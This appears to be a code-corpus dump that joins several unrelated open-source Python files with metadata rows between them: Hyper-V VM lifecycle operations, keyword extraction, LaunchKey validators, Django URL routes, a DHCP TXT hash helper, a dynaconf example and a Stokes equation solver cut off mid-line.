'convert',
'-f',
'raw',
'-O',
'vpc',
configdrive_path_iso,
configdrive_path,
attempts=1)
self._pathutils.remove(configdrive_path_iso)
else:
configdrive_path = configdrive_path_iso
return configdrive_path
def attach_config_drive(self, instance, configdrive_path, vm_gen):
configdrive_ext = configdrive_path[(configdrive_path.rfind('.') + 1):]
# Do the attach here and if there is a certain file format that isn't
# supported in constants.DISK_FORMAT_MAP then bomb out.
try:
drive_type = constants.DISK_FORMAT_MAP[configdrive_ext]
controller_type = VM_GENERATIONS_CONTROLLER_TYPES[vm_gen]
self._attach_drive(instance.name, configdrive_path, 1, 0,
controller_type, drive_type)
except KeyError:
raise exception.InvalidDiskFormat(disk_format=configdrive_ext)
def _detach_config_drive(self, instance_name, rescue=False, delete=False):
configdrive_path = self._pathutils.lookup_configdrive_path(
instance_name, rescue=rescue)
if configdrive_path:
self._vmutils.detach_vm_disk(instance_name,
configdrive_path,
is_physical=False)
if delete:
self._pathutils.remove(configdrive_path)
@serialconsoleops.instance_synchronized
def _delete_disk_files(self, instance_name):
# We want to avoid the situation in which serial console workers
# are started while we perform this operation, preventing us from
# deleting the instance log files (bug #1556189). This can happen
# due to delayed instance lifecycle events.
#
# The unsynchronized method is being used to avoid a deadlock.
self._serial_console_ops.stop_console_handler_unsync(instance_name)
self._pathutils.get_instance_dir(instance_name,
create_dir=False,
remove_dir=True)
def destroy(self, instance, network_info, block_device_info,
destroy_disks=True):
instance_name = instance.name
LOG.info("Got request to destroy instance", instance=instance)
try:
if self._vmutils.vm_exists(instance_name):
# Stop the VM first.
self._vmutils.stop_vm_jobs(instance_name)
self.power_off(instance)
self._vmutils.destroy_vm(instance_name)
elif self._migrutils.planned_vm_exists(instance_name):
self._migrutils.destroy_existing_planned_vm(instance_name)
else:
LOG.debug("Instance not found", instance=instance)
# NOTE(claudiub): The vifs should be unplugged and the volumes
# should be disconnected even if the VM doesn't exist anymore,
# so they are not leaked.
self.unplug_vifs(instance, network_info)
self._volumeops.disconnect_volumes(block_device_info)
if destroy_disks:
self._delete_disk_files(instance_name)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception('Failed to destroy instance: %s', instance_name)
def reboot(self, instance, network_info, reboot_type):
"""Reboot the specified instance."""
LOG.debug("Rebooting instance", instance=instance)
if reboot_type == REBOOT_TYPE_SOFT:
if self._soft_shutdown(instance):
self.power_on(instance, network_info=network_info)
return
self._set_vm_state(instance,
os_win_const.HYPERV_VM_STATE_REBOOT)
def _soft_shutdown(self, instance,
timeout=CONF.hyperv.wait_soft_reboot_seconds,
retry_interval=SHUTDOWN_TIME_INCREMENT):
"""Perform a soft shutdown on the VM.
:return: True if the instance was shutdown within time limit,
False otherwise.
"""
LOG.debug("Performing Soft shutdown on instance", instance=instance)
while timeout > 0:
# Perform a soft shutdown on the instance.
# Wait maximum timeout for the instance to be shutdown.
# If it was not shutdown, retry until it succeeds or a maximum of
# time waited is equal to timeout.
wait_time = min(retry_interval, timeout)
try:
LOG.debug("Soft shutdown instance, timeout remaining: %d",
timeout, instance=instance)
self._vmutils.soft_shutdown_vm(instance.name)
if self._wait_for_power_off(instance.name, wait_time):
LOG.info("Soft shutdown succeeded.",
instance=instance)
return True
except os_win_exc.HyperVException as e:
# Exception is raised when trying to shutdown the instance
# while it is still booting.
LOG.debug("Soft shutdown failed: %s", e, instance=instance)
time.sleep(wait_time)
timeout -= retry_interval
LOG.warning("Timed out while waiting for soft shutdown.",
instance=instance)
return False
def pause(self, instance):
"""Pause VM instance."""
LOG.debug("Pause instance", instance=instance)
self._set_vm_state(instance,
os_win_const.HYPERV_VM_STATE_PAUSED)
def unpause(self, instance):
"""Unpause paused VM instance."""
LOG.debug("Unpause instance", instance=instance)
self._set_vm_state(instance,
os_win_const.HYPERV_VM_STATE_ENABLED)
def suspend(self, instance):
"""Suspend the specified instance."""
LOG.debug("Suspend instance", instance=instance)
self._set_vm_state(instance,
os_win_const.HYPERV_VM_STATE_SUSPENDED)
def resume(self, instance):
"""Resume the suspended VM instance."""
LOG.debug("Resume instance", instance=instance)
self._set_vm_state(instance,
os_win_const.HYPERV_VM_STATE_ENABLED)
def power_off(self, instance, timeout=0, retry_interval=0):
"""Power off the specified instance."""
LOG.debug("Power off instance", instance=instance)
# We must make sure that the console log workers are stopped,
# otherwise we won't be able to delete or move the VM log files.
self._serial_console_ops.stop_console_handler(instance.name)
if retry_interval <= 0:
retry_interval = SHUTDOWN_TIME_INCREMENT
try:
if timeout and self._soft_shutdown(instance,
timeout,
retry_interval):
return
self._set_vm_state(instance,
os_win_const.HYPERV_VM_STATE_DISABLED)
except os_win_exc.HyperVVMNotFoundException:
# The manager can call the stop API after receiving instance
# power off events. If this is triggered when the instance
# is being deleted, it might attempt to power off an unexisting
# instance. We'll just pass in this case.
LOG.debug("Instance not found. Skipping power off",
instance=instance)
def power_on(self, instance, block_device_info=None, network_info=None,
should_plug_vifs=True):
"""Power on the specified instance."""
LOG.debug("Power on instance", instance=instance)
if block_device_info:
self._volumeops.fix_instance_volume_disk_paths(instance.name,
block_device_info)
if should_plug_vifs:
self.plug_vifs(instance, network_info)
self._set_vm_state(instance, os_win_const.HYPERV_VM_STATE_ENABLED)
def _set_vm_state(self, instance, req_state):
instance_name = instance.name
try:
self._vmutils.set_vm_state(instance_name, req_state)
LOG.debug("Successfully changed state of VM %(instance_name)s"
" to: %(req_state)s", {'instance_name': instance_name,
'req_state': req_state})
except Exception:
with excutils.save_and_reraise_exception():
LOG.error("Failed to change vm state of %(instance_name)s"
" to %(req_state)s",
{'instance_name': instance_name,
'req_state': req_state})
def _get_vm_state(self, instance_name):
summary_info = self._vmutils.get_vm_summary_info(instance_name)
return summary_info['EnabledState']
def _wait_for_power_off(self, instance_name, time_limit):
"""Waiting for a VM to be in a disabled state.
:return: True if the instance is shutdown within time_limit,
False otherwise.
"""
desired_vm_states = [os_win_const.HYPERV_VM_STATE_DISABLED]
def _check_vm_status(instance_name):
if self._get_vm_state(instance_name) in desired_vm_states:
raise loopingcall.LoopingCallDone()
periodic_call = loopingcall.FixedIntervalLoopingCall(_check_vm_status,
instance_name)
try:
# add a timeout to the periodic call.
periodic_call.start(interval=SHUTDOWN_TIME_INCREMENT)
etimeout.with_timeout(time_limit, periodic_call.wait)
except etimeout.Timeout:
# VM did not shutdown in the expected time_limit.
return False
finally:
# stop the periodic call, in case of exceptions or Timeout.
periodic_call.stop()
return True
def resume_state_on_host_boot(self, context, instance, network_info,
block_device_info=None):
"""Resume guest state when a host is booted."""
self.power_on(instance, block_device_info, network_info)
def _create_vm_com_port_pipes(self, instance, serial_ports):
for port_number, port_type in serial_ports.items():
pipe_path = r'\\.\pipe\%s_%s' % (instance.uuid, port_type)
self._vmutils.set_vm_serial_port_connection(
instance.name, port_number, pipe_path)
def copy_vm_dvd_disks(self, vm_name, dest_host):
dvd_disk_paths = self._vmutils.get_vm_dvd_disk_paths(vm_name)
dest_path = self._pathutils.get_instance_dir(
vm_name, remote_server=dest_host)
for path in dvd_disk_paths:
self._pathutils.copyfile(path, dest_path)
def plug_vifs(self, instance, network_info):
if network_info:
for vif in network_info:
self._vif_driver.plug(instance, vif)
def unplug_vifs(self, instance, network_info):
if network_info:
for vif in network_info:
self._vif_driver.unplug(instance, vif)
def _check_hotplug_available(self, instance):
"""Check whether attaching an interface is possible for the given
instance.
:returns: True if attaching / detaching interfaces is possible for the
given instance.
"""
vm_state = self._get_vm_state(instance.name)
if vm_state == os_win_const.HYPERV_VM_STATE_DISABLED:
# can attach / detach interface to stopped VMs.
return True
if not self._hostutils.check_min_windows_version(10, 0):
# TODO(claudiub): add set log level to error after string freeze.
LOG.debug("vNIC hot plugging is supported only in newer "
"versions than Windows Hyper-V / Server 2012 R2.")
return False
if (self._vmutils.get_vm_generation(instance.name) ==
constants.VM_GEN_1):
# TODO(claudiub): add set log level to error after string freeze.
LOG.debug("Cannot hot plug vNIC to a first generation VM.",
instance=instance)
return False
return True
def attach_interface(self, instance, vif):
if not self._check_hotplug_available(instance):
raise exception.InterfaceAttachFailed(instance_uuid=instance.uuid)
LOG.debug('Attaching vif: %s', vif['id'], instance=instance)
self._vmutils.create_nic(instance.name, vif['id'], vif['address'])
self._vif_driver.plug(instance, vif)
def detach_interface(self, instance, vif):
try:
if not self._check_hotplug_available(instance):
raise exception.InterfaceDetachFailed(
instance_uuid=instance.uuid)
LOG.debug('Detaching vif: %s', vif['id'], instance=instance)
self._vif_driver.unplug(instance, vif)
self._vmutils.destroy_nic(instance.name, vif['id'])
except os_win_exc.HyperVVMNotFoundException:
# TODO(claudiub): add set log level to error after string freeze.
LOG.debug("Instance not found during detach interface. It "
"might have been destroyed beforehand.",
instance=instance)
raise exception.InterfaceDetachFailed(instance_uuid=instance.uuid)
def rescue_instance(self, context, instance, network_info, image_meta,
rescue_password):
try:
self._rescue_instance(context, instance, network_info,
image_meta, rescue_password)
except Exception as exc:
with excutils.save_and_reraise_exception():
LOG.error("Instance rescue failed. Exception: %(exc)s. "
"Attempting to unrescue the instance.",
{'exc': exc}, instance=instance)
self.unrescue_instance(instance)
def _rescue_instance(self, context, instance, network_info, image_meta,
rescue_password):
rescue_image_id = image_meta.id or instance.image_ref
rescue_vhd_path = self._create_root_vhd(
context, instance, rescue_image_id=rescue_image_id)
rescue_vm_gen = self.get_image_vm_generation(instance.uuid,
image_meta)
vm_gen = self._vmutils.get_vm_generation(instance.name)
if rescue_vm_gen != vm_gen:
err_msg = _('The requested rescue image requires a different VM '
'generation than the actual rescued instance. '
'Rescue image VM generation: %(rescue_vm_gen)s. '
'Rescued instance VM generation: %(vm_gen)s.') % dict(
rescue_vm_gen=rescue_vm_gen,
vm_gen=vm_gen)
raise exception.ImageUnacceptable(reason=err_msg,
image_id=rescue_image_id)
root_vhd_path = self._pathutils.lookup_root_vhd_path(instance.name)
if not root_vhd_path:
err_msg = _('Instance root disk image could not be found. '
'Rescuing instances booted from volume is '
'not supported.')
raise exception.InstanceNotRescuable(reason=err_msg,
instance_id=instance.uuid)
controller_type = VM_GENERATIONS_CONTROLLER_TYPES[vm_gen]
self._vmutils.detach_vm_disk(instance.name, root_vhd_path,
is_physical=False)
self._attach_drive(instance.name, rescue_vhd_path, 0,
self._ROOT_DISK_CTRL_ADDR, controller_type)
self._vmutils.attach_scsi_drive(instance.name, root_vhd_path,
drive_type=constants.DISK)
if configdrive.required_by(instance):
self._detach_config_drive(instance.name)
rescue_configdrive_path = self._create_config_drive(
context,
instance,
injected_files=None,
admin_password=rescue_password,
network_info=network_info,
rescue=True)
self.attach_config_drive(instance, rescue_configdrive_path,
vm_gen)
self.power_on(instance)
def unrescue_instance(self, instance):
self.power_off(instance)
root_vhd_path = self._pathutils.lookup_root_vhd_path(instance.name)
rescue_vhd_path = self._pathutils.lookup_root_vhd_path(instance.name,
rescue=True)
if (instance.vm_state == vm_states.RESCUED and
not (rescue_vhd_path and root_vhd_path)):
err_msg = _('Missing instance root and/or rescue image. '
'The instance cannot be unrescued.')
raise exception.InstanceNotRescuable(reason=err_msg,
instance_id=instance.uuid)
vm_gen = self._vmutils.get_vm_generation(instance.name)
controller_type = VM_GENERATIONS_CONTROLLER_TYPES[vm_gen]
self._vmutils.detach_vm_disk(instance.name, root_vhd_path,
is_physical=False)
if rescue_vhd_path:
self._vmutils.detach_vm_disk(instance.name, rescue_vhd_path,
is_physical=False)
fileutils.delete_if_exists(rescue_vhd_path)
self._attach_drive(instance.name, root_vhd_path, 0,
self._ROOT_DISK_CTRL_ADDR, controller_type)
self._detach_config_drive(instance.name, rescue=True, delete=True)
# Reattach the configdrive, if exists and not already attached.
configdrive_path = self._pathutils.lookup_configdrive_path(
instance.name)
if configdrive_path and not self._vmutils.is_disk_attached(
configdrive_path, is_physical=False):
self.attach_config_drive(instance, configdrive_path, vm_gen)
self.power_on(instance)
def _set_instance_disk_qos_specs(self, instance):
quota_specs = self._get_scoped_flavor_extra_specs(instance, 'quota')
disk_total_bytes_sec = int(
quota_specs.get('disk_total_bytes_sec') or 0)
disk_total_iops_sec = int(
quota_specs.get('disk_total_iops_sec') or
self._volumeops.bytes_per_sec_to_iops(disk_total_bytes_sec))
if disk_total_iops_sec:
local_disks = self._get_instance_local_disks(instance.name)
for disk_path in local_disks:
self._vmutils.set_disk_qos_specs(disk_path,
disk_total_iops_sec)
def _get_instance_local_disks(self, instance_name):
instance_path = self._pathutils.get_instance_dir(instance_name)
instance_disks = self._vmutils.get_vm_storage_paths(instance_name)[0]
local_disks = [disk_path for disk_path in instance_disks
if instance_path in disk_path]
return local_disks
def _get_scoped_flavor_extra_specs(self, instance, scope):
extra_specs = instance.flavor.extra_specs or {}
filtered_specs = {}
for spec, value in extra_specs.items():
if ':' in spec:
_scope, key = spec.split(':')
if _scope == scope:
filtered_specs[key] = value
return filtered_specs
| apache-2.0 | 2,815,185,111,773,525,000 | 44.140195 | 79 | 0.573919 | false | 4.314562 | true | false | false |
andychase/eventizer | parse/keywords.py | 1 | 1350 | def merge_words(words, desc):
"""
>>> list(merge_words(["Wow", "Yo", "Yo"], "Wow and Yo Yo"))
['Wow', 'Yo Yo']
"""
size = len(words)
skipNext = False
for i, word in enumerate(words):
if skipNext:
skipNext = False
continue
if i + 1 < size:
comb = word + " " + words[i + 1]
if desc.find(comb) != -1:
yield comb
skipNext = True
else:
yield word
else:
yield word
def capitalized(letter):
return letter.lower() == letter
def get_keywords(text):
"""
>>> from collections import namedtuple
>>> event = namedtuple('event', 'description keywords')
>>> def put(i): print i
>>> get_keywords("Go and see Vince Vincent")
['Go', 'Vince Vincent']
>>> get_keywords("GO AND SEE VINCE VINCENT")
[]
"""
words = text.split(" ")
# Get words longer than one letter
words = filter(lambda word: len(word) > 1, words)
# Filter not capitalized words
words = filter(lambda word: not capitalized(word[0]), words)
# Remove ALL CAPS words
words = filter(lambda word: capitalized(word[1]), words)
# Merge words that are adjacent
words = list(merge_words(words, text))
return words | mit | 6,268,337,354,913,017,000 | 27.391304 | 64 | 0.528889 | false | 3.947368 | false | false | false |
iovation/launchkey-python | launchkey/entities/validation.py | 2 | 10429 | """Validators"""
# pylint: disable=too-few-public-methods
from formencode import Schema, validators, ForEach
from ..utils.validation import ValidateISODate
class PublicKeyValidator(Schema):
"""Public Key entity Validator"""
id = validators.String()
active = validators.Bool()
date_created = ValidateISODate()
date_expires = ValidateISODate()
public_key = validators.String()
key_type = validators.Int(if_missing=0, if_empty=0)
allow_extra_fields = True
class DirectoryUserDeviceLinkResponseValidator(Schema):
"""Directory User Device link response validator"""
qrcode = validators.String() # URL
code = validators.String(min=7)
device_id = validators.String()
allow_extra_fields = True
class DirectoryGetDeviceResponseValidator(Schema):
"""Directory get Device response validator"""
id = validators.String()
name = validators.String()
status = validators.Int()
type = validators.String()
allow_extra_fields = True
class DirectoryGetSessionsValidator(Schema):
"""Directory get Sessions validator"""
auth_request = validators.String()
date_created = ValidateISODate()
service_icon = validators.String()
service_id = validators.String()
service_name = validators.String()
allow_extra_fields = True
class DirectoryValidator(Schema):
"""Directory entity validator"""
id = validators.String()
service_ids = ForEach(validators.String())
sdk_keys = ForEach(validators.String())
premium = validators.Bool()
name = validators.String()
android_key = validators.String()
ios_certificate_fingerprint = validators.String()
active = validators.Bool()
denial_context_inquiry_enabled = validators.Bool(if_empty=False,
if_missing=False)
webhook_url = validators.String()
allow_extra_fields = True
class DirectoryDeviceLinkCompletionValidator(Schema):
"""Directory User Device link completion validator"""
type = validators.OneOf(['DEVICE_LINK_COMPLETION'])
device_id = validators.String()
device_public_key = validators.String()
device_public_key_id = validators.String()
allow_extra_fields = True
class AuthorizationResponseValidator(Schema):
"""Authorization Response entity validator"""
auth = validators.String()
auth_jwe = validators.String(if_missing=None, if_empty=None)
service_user_hash = validators.String()
org_user_hash = validators.String()
user_push_id = validators.String()
public_key_id = validators.String()
allow_extra_fields = True
class AuthorizationResponsePackageValidator(Schema):
"""Authorization Response Package entity validator"""
service_pins = ForEach()
auth_request = validators.String() # UUID
response = validators.Bool()
device_id = validators.String()
allow_extra_fields = True
class AuthMethodsValidator(Schema):
"""Auth methods validator"""
method = validators.String()
set = validators.Bool(if_empty=None)
active = validators.Bool(if_empty=None)
allowed = validators.Bool(if_empty=None)
supported = validators.Bool(if_empty=None)
user_required = validators.Bool(if_empty=None)
passed = validators.Bool(if_empty=None)
error = validators.Bool(if_empty=None)
class GeoFenceValidator(Schema):
""" GeoFence Validator, can represent both GeoFence and GeoCircleFence """
name = validators.String(if_missing=None)
latitude = validators.Number()
longitude = validators.Number()
radius = validators.Number()
class GeoCircleFenceValidator(GeoFenceValidator):
""" GeoFence Validator, can represent ONLY GeoCircleFence """
type = validators.OneOf(["GEO_CIRCLE"])
class TerritoryFenceValidator(Schema):
""" TerritoryFence Validator"""
name = validators.String(if_missing=None)
type = validators.OneOf(["TERRITORY"], if_missing=None)
country = validators.Regex(r"^[A-Z]{2}$", not_empty=True)
administrative_area = validators.Regex(r"^[A-Z]{2}-[A-Z]{2}[A-Z]?$",
if_missing=None)
postal_code = validators.String(if_missing=None, if_empty=None)
@staticmethod
def _validate_python(value, _state):
if not value["administrative_area"]:
del value["administrative_area"]
if not value["postal_code"]:
del value["postal_code"]
class FenceValidator(Schema):
"""Fence validator"""
allow_extra_fields = True
type = validators.OneOf(["GEO_CIRCLE", "TERRITORY"], if_missing=None)
name = validators.String(if_missing=None)
@staticmethod
def _validate_python(value, _state):
if not value["type"]:
del value["type"]
GeoFenceValidator().to_python(value)
elif value["type"] == "GEO_CIRCLE":
GeoCircleFenceValidator().to_python(value)
elif value["type"] == "TERRITORY":
TerritoryFenceValidator().to_python(value)
class AuthPolicyValidator(Schema):
"""Auth policy validate for auth method insights"""
requirement = validators.String(if_missing=None, if_empty=None)
amount = validators.Number(if_missing=None)
types = ForEach(validators.String(), if_missing=None)
geofences = ForEach(FenceValidator(), if_missing=[], if_empty=[])
class PolicyTerritoryValidator(Schema):
"""Validates Territory fences inside policies"""
allow_extra_fields = True
country = validators.String(not_empty=True)
administrative_area = validators.String(if_missing=None)
postal_code = validators.String(if_missing=None, if_empty=None)
class PolicyGeoCircleValidator(Schema):
"""Validates GeoCircle fences inside policies"""
allow_extra_fields = True
latitude = validators.Number(not_empty=True)
longitude = validators.Number(not_empty=True)
radius = validators.Number(not_empty=True)
class PolicyFenceValidator(Schema):
"""Validates fence objects in policies"""
allow_extra_fields = True
type = validators.String(not_empty=True)
name = validators.String(if_missing=None, not_empty=True)
@staticmethod
def _validate_other(value, state):
if "type" in value:
if value["type"] == "TERRITORY":
value.update(PolicyTerritoryValidator().to_python(
value, state))
elif value["type"] == "GEO_CIRCLE":
value.update(PolicyGeoCircleValidator().to_python(
value, state))
return value
class ConditionalGeoFenceValidator(Schema):
"""Validates conditional geofence policies"""
allow_extra_fields = True
inside = validators.NotEmpty(accept_iterator=True)
outside = validators.NotEmpty(accept_iterator=True)
fences = ForEach(not_empty=True)
@staticmethod
def _validate_python(value, state):
if 'inside' in value and 'outside' in value:
value['inside'] = PolicyBaseValidator().to_python(
value['inside'], state)
value['outside'] = PolicyBaseValidator().to_python(
value['outside'], state)
return value
class MethodAmountPolicyValidator(Schema):
"""Validates method amount policies"""
allow_extra_fields = True
amount = validators.Int(not_empty=True)
class FactorsPolicyValidator(Schema):
"""Validates factors for policies"""
allow_extra_fields = True
factors = ForEach(validators.OneOf(
["KNOWLEDGE", "INHERENCE", "POSSESSION"]), not_empty=True)
class PolicyBaseValidator(Schema):
"""Base policy validator for legacy and new policies"""
allow_extra_fields = True
type = validators.String(if_missing="LEGACY")
fences = ForEach(PolicyFenceValidator())
@staticmethod
def _validate_python(value, state):
if value["type"] == "COND_GEO":
value.update(ConditionalGeoFenceValidator().to_python(
value, state))
elif value["type"] == "METHOD_AMOUNT":
value.update(MethodAmountPolicyValidator().to_python(value, state))
elif value["type"] == "FACTORS":
value.update(FactorsPolicyValidator().to_python(value, state))
elif value["type"] == "LEGACY":
if "deny_rooted_jailbroken" in value:
del value["deny_rooted_jailbroken"]
if "deny_emulator_simulator" in value:
del value["deny_emulator_simulator"]
del value["fences"]
return value
class ServiceSecurityPolicyValidator(PolicyBaseValidator):
"""Service Policy validator"""
allow_extra_fields = True
deny_rooted_jailbroken = validators.Bool(if_missing=None)
deny_emulator_simulator = validators.Bool(if_missing=None)
class JWEAuthorizationResponsePackageValidator(Schema):
"""Authorization Response JWE payload entity validator"""
service_pins = ForEach()
auth_request = validators.String() # UUID
type = validators.String()
reason = validators.String()
denial_reason = validators.String(if_missing=None, if_empty=None)
device_id = validators.String()
auth_policy = AuthPolicyValidator(if_missing=None)
auth_methods = ForEach(AuthMethodsValidator())
allow_extra_fields = True
class AuthorizeValidator(Schema):
"""Authorize entity validator"""
auth_request = validators.String(not_empty=True)
push_package = validators.String(if_missing=None, not_empty=True)
device_ids = ForEach(validators.String(), if_missing=None)
allow_extra_fields = True
class AuthorizeSSEValidator(Schema):
"""Authorize server-sent-event (webhook) validator"""
service_user_hash = validators.String()
api_time = validators.String()
allow_extra_fields = True
class ServiceValidator(Schema):
"""Service entity validation"""
id = validators.String()
icon = validators.String()
name = validators.String()
description = validators.String()
active = validators.Bool()
callback_url = validators.String()
allow_extra_fields = True
class ServiceTOTPVerificationValidator(Schema):
"""Service TOTP verification validation"""
valid = validators.Bool()
allow_extra_fields = True
class DirectoryUserTOTPValidator(Schema):
"""Directory TOTP post validator"""
algorithm = validators.String()
digits = validators.Int()
period = validators.Int()
secret = validators.String()
allow_extra_fields = True
| mit | 8,261,304,007,005,720,000 | 32.86039 | 79 | 0.678205 | false | 4.040682 | false | false | false |
SkillSmart/ConferenceManagementSystem | Portal/urls.py | 1 | 1214 | from django.conf.urls import url, include
from . import views
app_name = 'portal'
urlpatterns = [
url(r'^$', views.IndexView.as_view(), name='index'),
url(r'^competition/$', views.CompetitionIndex.as_view(), name='competition'),
url(r'^venue/$', views.VenueIndex.as_view(), name="venues"),
url(r'^venue/manage/$', views.VenueManagementView.as_view(), name="manage_venue"),
url(r'^venue/create/$', views.VenueCreate.as_view(), name='create_venue'),
url(r'^venue/(?P<slug>.+)/', views.VenueDetailView.as_view(), name="venue_detail"),
url(r'^teams/$', views.TeamListView.as_view(), name='teams'),
url(r'^teams/(?P<slug>[\w\-]+)/$', views.TeamDetailView.as_view(), name="team_profile"),
url(r'^teams/(?P<slug>[\w\-]+)/edit/$', views.TeamEditView.as_view(), name="edit_team"),
url(r'^experts/$', views.ExpertListView.as_view(), name='experts'),
url(r'^expert/(?P<slug>[\w\.]+)/$', views.ExpertDetailView.as_view(), name='expert_profile'),
url(r'^students/$', views.StudentListView.as_view(), name="students"),
url(r'^student/(?P<slug>[\w\.]+)/', views.StudentDetailView.as_view(), name='student_profile'),
url(r'^session/', include('SessionManagement.urls')),
] | mit | 1,118,255,267,880,372,000 | 56.857143 | 99 | 0.64168 | false | 3.145078 | false | true | false |
rubydhash/webradius | config_server/freeradius/raddb/python/txthash.py | 1 | 2346 | # -*- coding: utf-8 -*-
import re
import md5
import string
from exceptions import Exception
class TxtHash:
__id = None
__hw_type = None
__regex = None
__is_id = None
__digs = None
__regex_str = "([0-9a-f]{2})[^0-9a-f]?([0-9a-f]{2})[^0-9a-f]?([0-9a-f]{2})[^0-9a-f]?([0-9a-f]{2})[^0-9a-f]?([0-9a-f]{2})[^0-9a-f]?([0-9a-f]{2})"
def __init__(self, is_id, clientid_or_mac, hw_type):
self.__id = clientid_or_mac
self.__hw_type = hw_type
self.__is_id = is_id
self.__digs = string.digits + string.lowercase
self.__regex = re.compile(self.__regex_str, re.IGNORECASE)
# Retorna o valor para o hw_type passado, só da suporte a Ethernet a principio
def hw_type_to_int(self):
return {
'Ethernet': 1,
}[self.__hw_type]
def __int2base(self, x, base):
if x < 0:
sign = -1
elif x == 0:
return '0'
else:
sign = 1
x *= sign
digits = []
while x:
digits.append(self.__digs[x % base])
x /= base
if sign < 0:
digits.append('-')
digits.reverse()
return ''.join(digits)
def __get_prefix(self):
# Se for 31 indica que usou o campo "Client-Identifier" do DHCP para calcular o HASH
if self.__is_id:
return "31"
else:
return "00"
def txt(self):
try:
mac_itens = []
# Pega os elementos do match da expressao regular
for item in re.finditer(self.__regex, self.__id):
for item2 in item.groups():
mac_itens.append(item2)
# Pega o valor para o hw_type passado
decimals = [self.hw_type_to_int()]
# Converte cada elemento em decimal
for item in mac_itens:
a = int(item, 16)
decimals.append(a)
# Calcula o md5
m = md5.new()
m.update(bytearray(decimals))
# Retorna junto com o prefixo
return self.__get_prefix() + m.hexdigest()
except Exception:
raise Exception("Error calculating TXT hash.")
| lgpl-2.1 | -4,038,245,052,719,588,000 | 28.3125 | 148 | 0.469083 | false | 3.547655 | false | false | false |
rochacbruno/dynaconf | example/multiple_sources/app.py | 1 | 1469 | from dynaconf import settings
print("Read from settings.py:", settings.PYTHON_VAR) # noqa
# BY DEFAULT 'development' is the current env
print("Read from development_settings.py:", settings.PYTHON_DEV_VAR) # noqa
# If ENV_FOR_DYNACONF=production is in envvars so
# print("Read from production_settings.py:", settings.PYTHON_PROD_VAR) # noqa
# global_ overrides previous configs
print("Read from global_settings.py:", settings.PYTHON_GLOBAL_VAR) # noqa
print("Read from settings.yaml:", settings.YAML_VAR) # noqa
print("Read from settings.yml:", settings.YML_VAR) # noqa
print("Read from settings.toml:", settings.TOML_VAR) # noqa
print("Read from settings.tml:", settings.TML_VAR) # noqa
print("Read from settings.ini:", settings.INI_VAR) # noqa
print("Read from settings.conf:", settings.CONF_VAR) # noqa
print("Read from settings.properties:", settings.PROPERTIES_VAR) # noqa
print("Read from settings.json:", settings.JSON_VAR) # noqa
print("Read from .env:", settings.ENV_VAR) # noqa
print("Read from .env:", settings.WORKS) # noqa
assertions = {
"YAML_VAR": True,
"YML_VAR": True,
"TOML_VAR": True,
"INI_VAR": "1",
"CONF_VAR": "1",
"PROPERTIES_VAR": "1",
"JSON_VAR": True,
"ENV_VAR": True,
"WORKS": "multiple_sources",
}
for key, value in assertions.items():
found = settings.get(key)
assert found == getattr(settings, key)
assert found == value, f"expected: {key}: [{value}] found: [{found}]"
| mit | 6,942,934,247,941,992,000 | 33.97619 | 78 | 0.682097 | false | 3.193478 | false | false | false |
spectralDNS/shenfun | demo/Stokes2NP.py | 1 | 4031 | r"""Solve Stokes equations using a coupled formulation
The Stokes equations are in strong form
.. math::
-\nabla^2 u - \nabla p &= f \\
\nabla \cdot u &= h \\
u(x, y=\pm 1) &= 0 \\
u(x=\pm 1, y) &= 0
where :math:`f` and :math:`h` are given functions of space.
In addition we require :math:`\int p d\ = 0`, which is achieved by
fixing the coefficient :math:`\hat{p}_{0, 0} = 0`.
We use a tensorproductspace with a composite Legendre for the Dirichlet space
and a regular Legendre for the pressure space.
To remove all nullspaces we use a P_{N} x P_{N-2} basis, with P_{N-2} for the
pressure.
"""
import os
import numpy as np
from sympy import symbols, sin, cos
from shenfun import *
x, y = symbols("x,y", real=True)
assert comm.Get_size() == 1, "Two non-periodic directions only have solver implemented for serial"
# Some right hand side (manufactured solution)
#uex = (cos(4*np.pi*x)+sin(2*np.pi*y))*(1-y**2)*(1-x**2)
#uey = (sin(2*np.pi*x)+cos(6*np.pi*y))*(1-y**2)*(1-x**2)
uex = (cos(2*np.pi*x)*sin(2*np.pi*y))*(1-y**2)*(1-x**2)
uey = (-sin(2*np.pi*x)*cos(2*np.pi*y))*(1-x**2)
pe = -0.1*sin(2*x)*sin(4*y)
fx = -uex.diff(x, 2) - uex.diff(y, 2) - pe.diff(x, 1)
fy = -uey.diff(x, 2) - uey.diff(y, 2) - pe.diff(y, 1)
h = uex.diff(x, 1) + uey.diff(y, 1)
N = (50, 50)
family = 'Chebyshev'
#family = 'Legendre'
D0X = FunctionSpace(N[0], family, bc=(0, 0), scaled=True)
D0Y = FunctionSpace(N[1], family, bc=(-sin(2*np.pi*x)*(1-x**2), -sin(2*np.pi*x)*(1-x**2)), scaled=True)
D1Y = FunctionSpace(N[1], family, bc=(0, 0), scaled=True)
PX = FunctionSpace(N[0], family)
PY = FunctionSpace(N[1], family)
TD = TensorProductSpace(comm, (D0X, D0Y))
TD1 = TensorProductSpace(comm, (D0X, D1Y))
Q = TensorProductSpace(comm, (PX, PY), modify_spaces_inplace=True)
V = VectorSpace([TD1, TD])
VQ = CompositeSpace([V, Q])
# To get a P_N x P_{N-2} space, just pick the first N-2 items of the pressure basis
# Note that this effectively sets P_N and P_{N-1} to zero, but still the basis uses
# the same quadrature points as the Dirichlet basis, which is required for the inner
# products.
PX.slice = lambda: slice(0, PX.N-2)
PY.slice = lambda: slice(0, PY.N-2)
up = TrialFunction(VQ)
vq = TestFunction(VQ)
u, p = up
v, q = vq
# Assemble blocks of the complete block matrix
if family.lower() == 'legendre':
A00 = inner(grad(v), grad(u))
A01 = inner(div(v), p)
else:
A00 = inner(v, -div(grad(u)))
A01 = inner(v, -grad(p))
A10 = inner(q, div(u))
M, BM = BlockMatrices(A00+A01+A10) # Note BM is boundary matrix
uh_hat = Function(VQ)
# Assemble right hand side
fh = Array(VQ, buffer=(fx, fy, h))
f_, h_ = fh
fh_hat = Function(VQ)
f_hat, h_hat = fh_hat
f_hat = inner(v, f_, output_array=f_hat)
h_hat = inner(q, h_, output_array=h_hat)
# Solve problem
uh_hat = M.solve(fh_hat, u=uh_hat, constraints=((2, 0, 0),), BM=BM)
# (2, N[0]-1, 0),
# (2, N[0]*N[1]-1, 0),
# (2, N[0]*N[1]-N[1], 0))) # Constraint for component 2 of mixed space
# Move solution to regular Function
up = uh_hat.backward()
u_, p_ = up
# Exact solution
ux, uy = Array(V, buffer=(uex, uey))
pe = Array(Q, buffer=pe)
# Compute error
error = [comm.reduce(np.linalg.norm(ux-u_[0])),
